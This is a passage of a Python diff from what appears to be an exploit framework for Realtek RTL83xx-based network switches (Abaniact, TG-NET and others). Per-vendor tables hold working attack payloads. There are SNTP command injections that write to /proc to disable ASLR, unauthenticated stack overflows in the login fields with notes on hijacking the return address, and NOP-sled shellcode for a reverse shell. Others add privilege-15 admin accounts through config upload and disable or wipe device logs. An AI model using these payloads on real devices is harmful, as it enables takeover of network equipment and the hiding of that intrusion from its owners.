+						'json':True,
+						'encryption':'clear',
+						'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------',
+						'add_uri':'/cgi/httpuploadruncfg.cgi',
+						'del_query':'{"_ds=1&user=USERNAME&_de=1":{}}',
+						'del_uri':'/cgi/set.cgi?cmd=sys_acctDel',
+						'vulnerable': True,
+						'safe': True
+					}, 
+					'sntp': {
+						'description':'SNTP command injection (PoC: disable ASLR)',
+						'json':True,
+						'authenticated': True,
+						'enable_uri':'/cgi/set.cgi?cmd=sys_time',
+						'enable_query':'{"_ds=1&sntp=1&_de=1":{}}',
+						'status_uri':'/cgi/get.cgi?cmd=sys_time',
+						'inject_uri':'/cgi/set.cgi?cmd=sys_time',
+
+						'inject_query':'{"_ds=1&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&_de=1":{}}',
+						'check_query':'{"_ds=1&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&_de=1":{}}',
+
+						'delete_uri':'/cgi/set.cgi?cmd=sys_time',
+						'delete_query':'{"_ds=1&sntp=1&timezone=0&srvDef=ipv4&srvHost=+&port=139&dlsType=0&_de=1":{}}',
+						'disable_uri':'/cgi/set.cgi?cmd=sys_time',
+						'disable_query':'{"_ds=1&sntp=0&_de=1":{}}',
+						'verify_uri':'/tmp/check',
+						'vulnerable': True,
+						'safe': True
+					},
+					#
+					# The stack overflow in 'username' and 'password' at same request are multipurpose.
+					#
+
+					#
+					# The trick to jump and execute:
+					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
+					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
+					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
+					# 4. We will also feed required function parameters, by adding them to '_CMD_'
+					#
+					'stack_cgi_diag': {
+						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
+						'authenticated': False,
+
+						'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
+
+						'sys_ping_post_SIGSEGV': True,		# SIGSEGV ?
+
+						'workaround':False,	# My LAB workaround
+						'vulnerable': True,
+						'safe': True
+
+					},
+					'stack_cgi_log': {
+						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
+						'authenticated': False,
+						'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
+
+						#'log_settings_set_cmd':'&logState=1&consoleState=1&ramState=1&fileState=1',	# Enable Logging CMD
+						'log_settings_set_cmd':'&empty=1',			# Disable Logging CMD
+						'log_settings_set_SIGSEGV':True,			# Disable Logging SIGSEGV ?
+
+						'log_ramClear_cmd':'&target=0',				# Clean RAM CMD
+						'log_ramClear_SIGSEGV':True,				# Clean RAM SIGSEGV ?
+
+						'log_fileClear_cmd':'&target=1',			# Clean FILE log CMD
+						'log_fileClear_SIGSEGV':True,				# Clean FILE log SIGSEGV ?
+
+						'workaround':False,	# My LAB workaround
+						'verify_uri':'',
+						'vulnerable': True,
+						'safe': True
+					},
+					'stack_cgi_sntp': {
+						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
+						'authenticated': False,
+						'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
+
+						'sys_timeSntp_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&dlsType=0',
+						'sys_timeSntp_set_check':'&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&dlsType=0',
+
+						'sys_timeSntpDel_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=+&port=139&dlsType=0',				# CMD
+
+						'sys_timeSettings_set_cmd_enable':'&sntp=1',	# Enable CMD
+						'sys_timeSettings_set_cmd_disable':'&sntp=0',	# Disable CMD
+						'sys_timeSettings_set_SIGSEGV': True,		# SIGSEGV ?
+
+						'workaround':False,	# My LAB workaround
+						'verify_uri':'/tmp/check',
+						'vulnerable': True,
+						'safe': True
+					}, 
+					#
+					# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
+					# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
+					#
+					'heack_cgi_shell': {
+						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
+						'authenticated': False,
+						'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
+						'logout_uri':'/cgi/set.cgi?cmd=home_logout',
+						'query':'{"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1":{}}',
+						'stack':True, # False = use Heap, and there are no ASLR
+						'workaround':False,	# My LAB workaround
+						'vulnerable': True,
+						'safe': True
+					},
+
+				},
+			},
+
+			'Abaniact': {
+				'vendor': 'Abaniact',
+				'modulus_uri':'',
+				'info_leak':False,
+				'info_leak_JSON':False,
+				'info_leak_uri':'',
+				'xsid':False,
+				'xsid_uri':'',
+				'login': {
+					'description':'Login/Logout on remote device',
+					'authenticated': True,
+					'json':False,
+					'encryption':'clear',
+					'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+					'query':'username=USERNAME&password=PASSWORD&login=1',
+					'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',
+					'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
+					'vulnerable': True,
+					'safe': True
+				},
+				'log':{
+						'description':'Disable and clean logs',
+						'authenticated': True,
+						'json':False,
+						'disable_uri':'/cgi-bin/dispatcher.cgi',
+						'disable_query':'LOGGING_SERVICE=0&cmd=5121',
+						'status':'',
+						'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',
+						'clean_logfile_query':'cmd_5132=Clear+file+messages',
+						'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',
+						'clean_logmem_query':'cmd_5132=Clear+buffered+messages',
+						'vulnerable': True,
+						'safe': True
+				},
+				# Verify lacking authentication
+				'verify': {
+						'httpuploadbakcfg.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':True,
+							'description':'Upload "backup-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httpuploadbakcfg.cgi',
+							'check_uri':'',
+							'content':'dummy',
+							'content_check':' Invalid config file!!', # one 0x20 in beginning
+							'vulnerable': True,
+							'safe': True
+						},
+						'httpuploadruncfg.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':True,
+							'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httpuploadruncfg.cgi',
+							'check_uri':'',
+							'content':'dummy',
+							'content_check':' Invalid config file!!', # one 0x20 in beginning
+							'vulnerable': True,
+							'safe': True
+						},
+						'httprestorecfg.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':True,
+							'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httprestorecfg.cgi',
+							'check_uri':'',
+							'content':'dummy',
+							'content_check':' Invalid config file!!', # one 0x20 in beginning
+							'vulnerable': True,
+							'safe': True
+						},
+						'httpupload.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':True,
+							'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httpupload.cgi',
+							'check_uri':'',
+							'content':'dummy',
+							'content_check':'Image Signature Error',
+							'vulnerable': True,
+							'safe': True
+						},
+						'dispatcher.cgi': { # 'username' also suffer from stack overflow
+							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
+							'response':'502',
+							'Content-Type':False,
+							'authenticated': False,
+							'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+							'content':'username=admin&password='+ self.random_string(184) + '&login=1',
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+				},
+				'exploit': {
+					'heack_hydra_shell': {
+						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
+						'authenticated': False,
+						'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
+						'vulnerable': True,
+						'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
+					},
+					'priv15_account': {
+						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
+						'json':False,
+						'authenticated': False,
+						'encryption':'md5',
+						'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" secret encrypted PASSWORD\n\n------',
+						'add_uri':'/cgi-bin/httpuploadruncfg.cgi',
+						'del_query':'', 
+						'del_uri':'/cgi-bin/dispatcher.cgi?cmd=526&usrName=USERNAME',
+						'vulnerable': True,
+						'safe': True
+					}, 
+					'sntp': {
+						'description':'SNTP command injection (PoC: disable ASLR)',
+						'json':False,
+						'authenticated': True,
+						'enable_uri':'/cgi-bin/dispatcher.cgi',
+						'enable_query':'sntp_enable=1&cmd=548',
+						'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',
+						'inject_uri':'/cgi-bin/dispatcher.cgi',
+						'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',
+						'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',
+						'delete_uri':'/cgi-bin/dispatcher.cgi',
+						'delete_query':'sntp_Server=+&sntp_Port=123&cmd=550',
+						'disable_uri':'/cgi-bin/dispatcher.cgi',
+						'disable_query':'sntp_enable=0&cmd=548',
+						'verify_uri':'/tmp/check',
+						'vulnerable': True,
+						'safe': True
+					},
+					#
+					# The stack overflow in 'username' and 'password' at same request are multipurpose.
+					#
+
+					#
+					# The trick to jump and execute:
+					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
+					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
+					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
+					# 4. We will also feed required function parameters, by adding them to '_CMD_'
+					#
+					'stack_cgi_diag': {
+						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
+						'authenticated': False,
+
+						'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+						'content':'username='+ self.random_string(212) +'_JUMP_&password='+ self.random_string(180) +'&login=1&_CMD_',
+						'sys_ping_post_check':'',
+						'sys_ping_post_SIGSEGV': False,		# SIGSEGV ?
+
+						'workaround':True,	# My LAB workaround
+
+						'vulnerable': True,
+						'safe': True
+
+					},
+					'stack_cgi_log': {
+						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
+						'authenticated': False,
+						'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+						'content':'username='+ self.random_string(212) +'_JUMP_&password='+ self.random_string(180) +'_CMD_&login=1',
+
+						'log_settings_set_cmd':'&LOGGING_SERVICE=0',# Disable Logging CMD
+						'log_settings_set_SIGSEGV':False,			# Disable Logging SIGSEGV ?
+
+						'log_ramClear_cmd':'',						# Clean RAM log CMD
+						'log_ramClear_SIGSEGV':False,				# Clean RAM log SIGSEGV ?
+
+						'log_fileClear_cmd':'',						# Clean FILE log CMD
+						'log_fileClear_SIGSEGV':False,				# Clean FILE log SIGSEGV ?
+
+						'workaround':True,	# My LAB workaround
+						'verify_uri':'/tmp/check',
+						'vulnerable': True,
+						'safe': True
+					},
+					'stack_cgi_sntp': {
+						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
+						'authenticated': False,
+						'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+						'content':'username='+ self.random_string(212) +'_JUMP_&password='+ self.random_string(180) +'_CMD_&login=1',
+
+						'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123',
+						'sys_timeSntp_set_check':'&sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=139',
+
+						'sys_timeSntpDel_set_cmd':'&sntp_Server=+&sntp_Port=139',
+
+						'sys_timeSettings_set_cmd_enable':'&sntp_enable=1',
+						'sys_timeSettings_set_cmd_disable':'&sntp_enable=0',
+						'sys_timeSettings_set_SIGSEGV': False,		# SIGSEGV ?
+
+						'workaround': True,	# My LAB workaround
+						'verify_uri':'/tmp/check',
+						'vulnerable': False,
+						'safe': True
+					}, 
+
+					#
+					# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
+					# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
+					#
+					'heack_cgi_shell': {
+						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
+						'authenticated': False,
+						'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+						'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
+						'query':'username=_ALIGN_USRNOP&password=_PWDNOP_RA_START&login=1&shellcode=_USRNOP_USRNOP_USRNOP_SHELLCODE',
+						'workaround':True,	# My LAB workaround
+						'stack':True, # False = use Heap, and there are no ASLR
+						'vulnerable': True,
+						'safe': True
+
+					},
+
+				},
+			},
+
+			'TG-NET': {
+				'vendor': 'Shenzhen TG-NET Botone Technology Co,. Ltd.',
+				'uri':'http://www.tg-net.net/productshow.asp?ProdNum=1049&parentid=98',
+				'modulus_uri':'',
+				'info_leak':False,
+				'info_leak_JSON':False,
+				'info_leak_uri':'',
+				'xsid':False,
+				'xsid_uri':'',
+				'login': {
+					'description':'Login/Logout on remote device',
+					'authenticated': True,
+					'json':False,
+					'encryption':'clear',
+					'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+					'query':'username=USERNAME&password=PASSWORD&login=1',
+					'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',
+					'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
+					'vulnerable': True,
+					'safe': True
+				},
+				'log':{
+						'description':'Disable and clean logs',
+						'authenticated': True,
+						'json':False,
+						'disable_uri':'/cgi-bin/dispatcher.cgi',
+						'disable_query':'LOGGING_SERVICE=0&cmd=4353',
+						'status':'/cgi-bin/dispatcher.cgi?cmd=4352',
+						'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',
+						'clean_logfile_query':'cmd_4364=Clear+file+messages',
+						'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',
+						'clean_logmem_query':'cmd_4364=Clear+buffered+messages',
+						'vulnerable': True,
+						'safe': True
+				},
+				# Verify lacking authentication
+				'verify': {
+						'httpuploadbakcfg.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':True,
+							'description':'Upload "backup-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httpuploadbakcfg.cgi',
+							'check_uri':'',
+							'content':'dummy',
+							'content_check':' Invalid config file!!', # one 0x20 in beginning
+							'vulnerable': True,
+							'safe': True
+						},
+						'httpuploadruncfg.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':True,
+							'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httpuploadruncfg.cgi',
+							'check_uri':'',
+							'content':'dummy',
+							'content_check':' Invalid config file!!', # one 0x20 in beginning
+							'vulnerable': True,
+							'safe': True
+						},
+						'httprestorecfg.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':True,
+							'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httprestorecfg.cgi',
+							'check_uri':'',
+							'content':'dummy',
+							'content_check':' Invalid config file!!', # one 0x20 in beginning
+							'vulnerable': True,
+							'safe': True
+						},
+						'httpupload.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':True,
+							'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httpupload.cgi',
+							'check_uri':'',
+							'content':'dummy',
+							'content_check':'Image Signature Error',
+							'vulnerable': True,
+							'safe': True
+						},
+						'dispatcher.cgi': { # 'username' also suffer from stack overflow
+							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
+							'response':'502',
+							'Content-Type':False,
+							'authenticated': False,
+							'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+							'content':'username=admin&password='+ self.random_string(184) + '&login=1',
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+						'httpuploadfirmware.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':True,
+							'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httpuploadfirmware.cgi',
+							'check_uri':'',
+							'content':'dummy',
+							'content_check':'Image Signature Error',
+							'vulnerable': True,
+							'safe': True
+						},
+						'httpupload_runstart_cfg.cgi':{
+							'authenticated': False,
+							'response':'file',
+							'Content-Type':True,
+							'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
+							'uri':'/cgi-bin/httpupload_runstart_cfg.cgi',
+							'check_uri':'/tmp/startup-config',
+							'content':'/tmp/startup-config',
+							'content_check':'/tmp/startup-config',
+							'vulnerable': True,
+							'safe': True
+						},
+						'version_upgrade.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':True,
+							'description':'Upload/Upgrade "Firmware" (Frontend to "httpuploadfirmware.cgi")',
+							'uri':'/cgi-bin/version_upgrade.cgi',
+							'check_uri':'',
+							'content':'Firm Upgrade',
+							'content_check':'Firm Upgrade',
+							'vulnerable': True,
+							'safe': True
+						},
+						'factory_reset.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':True,
+							'description':'Reset device to factory default (PoC: Too dangerous to verify)',
+							'uri':'/cgi-bin/factory_reset.cgi',
+							'check_uri':'',
+							'content':'Too dangerous to verify',
+							'content_check':'dummy',
+							'vulnerable': True,
+							'safe': False
+						},
+						'sysinfo_config.cgi':{
+							'authenticated': False,
+							'response':'html',
+							'Content-Type':False,
+							'description':'System basic information configuration (Frontend to "change_mac_addr_set.cgi")',
+							'uri':'/cgi-bin/sysinfo_config.cgi',
+							'check_uri':'',
+							'content':'dummy',
+							'content_check':'"/cgi-bin/change_mac_addr_set',
+							'vulnerable': True,
+							'safe': True
+						},
+						'change_mac_addr_set.cgi': {
+							'description':'Stack overflow in "switch_type/sys_hardver" (PoC: crash CGI)',
+							'response':'502',
+							'Content-Type':False,
+							'authenticated': False,
+							'uri':'/cgi-bin/change_mac_addr_set.cgi',
+							'content':'switch_type='+ self.random_string(116) +'&sys_hardver=31337&sys_macaddr=DE:AD:BE:EF:13:37&sys_serialnumber=DE:AD:BE:EF:13:37&password=tgnetadmin',
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+
+				},
+				'exploit': {
+					'heack_hydra_shell': {
+						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
+						'authenticated': False,
+						'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
+						'vulnerable': True,
+						'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
+					},
+					'priv15_account': {
+						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
+						'json':False,
+						'authenticated': False,
+						'encryption':'clear',
+						'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------',
+						'add_uri':'/cgi-bin/httpuploadruncfg.cgi',
+						'del_query':'', 
+						'del_uri':'/cgi-bin/dispatcher.cgi?cmd=524&usrName=USERNAME',
+						'vulnerable': True,
+						'safe': True
+					}, 
+					'sntp': {
+						'description':'SNTP command injection (PoC: disable ASLR)',
+						'json':False,
+						'authenticated': True,
+						'enable_uri':'/cgi-bin/dispatcher.cgi',
+						'enable_query':'sntp_enable=1&cmd=548',
+						'status_uri':'cmd=547',
+						'inject_uri':'/cgi-bin/dispatcher.cgi',
+
+						'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',
+						'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',
+
+						'delete_uri':'/cgi-bin/dispatcher.cgi',
+						'delete_query':'sntp_Server=+&sntp_Port=123&cmd=550',
+						'disable_uri':'/cgi-bin/dispatcher.cgi',
+						'disable_query':'sntp_enable=0&cmd=548',
+						'verify_uri':'/tmp/check',
+						'vulnerable': True,
+						'safe': True
+					},
+
+					#
+					# The stack overflow in 'username' and 'password' at same request are multipurpose.
+					#
+
+					#
+					# The trick to jump and execute:
+					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
+					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
+					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
+					# 4. We will also feed required function parameters, by adding them to '_CMD_'
+					#
+					'stack_cgi_diag': {
+						'vulnerable': False,
+					},
+					'stack_cgi_log': {
+						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
+						'authenticated': False,
+						'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+						'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',
+
+						'log_settings_set_cmd':'&LOGGING_SERVICE=0',			# Disable Logging CMD
+						'log_settings_set_SIGSEGV':True,						# Disable Logging SIGSEGV ?
+
+						'log_ramClear_cmd':'',									# Clean RAM log CMD
+						'log_ramClear_SIGSEGV':False,							# Clean RAM log SIGSEGV ?
+
+						'log_fileClear_cmd':'',									# Clean FILE log CMD
+						'log_fileClear_SIGSEGV':False,							# Clean FILE log SIGSEGV ?
+
+						'workaround':False,	# My LAB workaround
+						'verify_uri':'/tmp/check',
+						'vulnerable': True,
+						'safe': True
+					},
+					'stack_cgi_sntp': {
+						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
+						'authenticated': False,
+						'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+						'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',
+						'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123',
+						'sys_timeSntp_set_check':'&sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123',
+						'sys_timeSntpDel_set_cmd':'&sntp_Server=+&sntp_Port=123',
+						'sys_timeSettings_set_cmd_enable':'&sntp_enable=1',
+						'sys_timeSettings_set_cmd_disable':'&sntp_enable=0',
+						'sys_timeSettings_set_SIGSEGV': False,		# SIGSEGV ?
+						'workaround':True,	# My LAB workaround
+						'verify_uri':'/tmp/check',
+						'vulnerable': True,
+						'safe': True
+					}, 
+
+					#
+					# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
+					# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
+					#
+					'heack_cgi_shell': {
+						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
+						'authenticated': False,
+						'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
+						'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
+						'query':'username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&login=1',
+						'workaround':False,	# My LAB workaround
+						#'stack':False, # False = use Heap, and there are no ASLR
+						'stack':True, # False = use Heap, and there are no ASLR
+						'vulnerable': True,
+						'safe': True
+					},
+
+				},
+			},
+
+
+		}
+
+		if self.ETag == 'report':
+
+			sorted_dict = OrderedDict(sorted(Vendor_ETag.items(), key=lambda t: t[1])) # sorted by ETag value
+			for targets in sorted_dict:
+				self.target = copy.deepcopy(Vendor_Template[Vendor_ETag[targets]['template']])
+				self.source = Vendor_ETag[targets]
+				self.dict_merge(self.target,self.source)
+				print ""
+
+				tmp = "] {} {} v{} [".format(self.target['vendor'],self.target['model'],self.target['version'])
+				print "[{:=^78}]".format(tmp)
+
+				print self.target['uri']
+
+				print "" # make it nicer to read
+
+				LEN = len(self.target['exploit'])
+				for exploits in self.target['exploit']:
+					if not self.target['exploit'][exploits]['vulnerable']:
+						LEN = LEN - 1
+
+				tmp = "] {}({}) [".format("Exploits ",LEN)
+				print "[{:-^78}]".format(tmp)
+
+				for exploits in self.target['exploit']:
+					tmp = self.target['exploit'][exploits]
+					if self.target['exploit'][exploits]['vulnerable']:
+						log.success("{:.<54}[Authenticated: {}]\n{}\n".format(exploits, tmp['authenticated'] ,tmp['description']))
+
+				print "" # make it nicer to read
+
+				tmp = "] {}({}) [".format("Verification ",len(self.target['verify']))
+				print "[{:-^78}]".format(tmp)
+
+				for verification in self.target['verify']:
+					tmp = self.target['verify'][verification]
+					log.success("{:.<54}[Authenticated: {}]\n{}\n".format(verification, tmp['authenticated'] ,tmp['description']))
+
+
+				print ""
+			return False
+		elif self.ETag == 'help':
+			sorted_dict = OrderedDict(sorted(Vendor_ETag.items(), key=lambda t: t[1])) # sorted by ETag value
+			for targets in sorted_dict:
+				self.target = copy.deepcopy(Vendor_Template[Vendor_ETag[targets]['template']])
+				self.source = Vendor_ETag[targets]
+				self.dict_merge(self.target,self.source)
+				log.info("ETag: {:<11} [{} {} v{}]".format(targets, self.target['vendor'],self.target['model'],self.target['version']))
+			print ""
+			return False
+
+
+		for check in Vendor_ETag.keys():
+			if check == self.ETag:
+				self.target = copy.deepcopy(Vendor_Template[Vendor_ETag[check]['template']])
+				self.source = Vendor_ETag[check]
+
+				self.dict_merge(self.target,self.source)
+				return self.target
+
+		return False
+
+
+class RTK_RTL83xx:
+
+	def __init__(self, rhost, proto, verbose, creds, Raw, lhost, lport):
+		self.rhost = rhost
+		self.proto = proto
+		self.verbose = verbose
+		self.credentials = creds
+		self.Raw = Raw
+		self.lhost = lhost
+		self.lport = lport
+
+		self.event = threading.Event()
+
+		self.headers = {
+			'Host':rhost,
+			'User-Agent':'Chrome'
+			}
+
+	#
+	# Workaround for Planet Tech. and others as it will always be logged in at my LAB
+	#
+	def Workaround_logout(self):
+		try:
+			URI = '/cgi-bin/dispatcher.cgi?cmd=3'
+			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,True) 
+			return True
+		except Exception as e:
+			return True
+			pass
+
+	#
+	# Very rare I have seen garbage returned with JSON data
+	# make sure to clean out potential garbage, so we can load JSON with json.loads()
+	#
+	def clean_json(self, text):
+		self.text = text
+
+		start = 0
+		result = ''
+
+		for check in range(0,len(self.text)):
+			if self.text[check] == '{':
+				result += self.text[check]
+				start = start + 1
+			elif start:
+				result += self.text[check]
+				if self.text[check] == '}':
+					start = start - 1
+
+		return result
+
+	#
+	# Small function to return N in random chars
+	#
+	def random_string(self,length):
+		self.length = length
+
+		return 'A' * self.length
+		#return ''.join(random.choice(string.lowercase) for i in range(self.length))
+
+	def md5hash(self, string, base64encode):
+		self.string = string
+		self.base64encode = base64encode
+
+		hash_object = hashlib.md5(self.string)
+		md5_hash = hash_object.hexdigest()
+
+		if self.base64encode:
+			return base64.b64encode(md5_hash)	# Why...
+		else:
+			return md5_hash
+
+	def caesar_encode(self, string):
+		self.string = string
+
+		return ''.join(chr(32 + int(ord(self.string[char])) % 95) for char in range(0,len(self.string)))
+
+	def caesar_decode(self, string):
+		self.string = string
+
+		return ''.join(chr(int(ord(self.string[char])) - 32 % 95) for char in range(0,len(self.string)))
+
+	#
+	# Obfuscation
+	# 
+	# Functionality:
+	# Reversed password string, split each character 7 bytes apart, split and put size of password at two fixed locations in the string,
+	# then fill the rest with random garbage to look like advanced and unknown encryption
+	#
+	# Netgear: GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP
+	# Zyxel: GS1900-24-2.40_AAHL.1_20180705
+	#
+	def obfuscation_encode(self, password):
+		self.password = password
+
+		text = ''
+		possible = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
+
+		# Max 99 char in password
+		self.password = self.password[:99]
+
+		inlen = len(self.password)
+		inlenn = len(self.password)
+
+		if (len((self.password) * 7) + 7) <= 320:
+			PASS_LEN = 321 # string needs to be 320 bytes as minimum
+		else:
+			PASS_LEN = (len((self.password) * 7) + 7)
+
+		for i in xrange(1, PASS_LEN ,1):
+			if (0 == i % 7 and inlen > 0):
+				text += self.password[inlen-1]
+				inlen = inlen - 1
+			elif (i == 123):
+				if inlenn < 10:
+					text += '0'
+				else:
+					text += str(int(math.floor(inlenn / 10)))
+			elif (i == 289):
+				text += str(inlenn % 10)
+			else:
+				#text += '_'	# debug
+				text += possible[int(math.floor(randint(0, len(possible)-1)))] # random garbage
+
+		return text
+
+	#
+	# Obfuscation
+	#
+	# Netgear: GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP
+	# Zyxel: GS1900-24-2.40_AAHL.1_20180705
+	#
+	def obfuscation_decode(self, password):
+		self.password = password
+
+		text = ''
+		for i in range(1, len(self.password) ):
+			if (0 == i % 7):
+				if len(text) == (int(self.password[122]) * 10) + int(self.password[288]):
+					break
+				text += self.password[i-1]
+		text = text[::-1] # reverse string
+		return text
+
+	def netgear_hash(self, URI):
+		self.URI = URI
+
+		return '&hash=' + self.md5hash(URI.split("?")[1],False)
+
+	def _encrypt_RSA(self, modulus, passphrase, text):
+		key = RSA.construct((modulus, passphrase))
+		cipher = PKCS1_v1_5.new(key)
+		ciphertext = cipher.encrypt(text)
+ 
+		return ciphertext
+  
+	def RSA_encrypt_params(self, cisco_modulus, password):
+		self.cisco_modulus = cisco_modulus
+		self.password = password
+
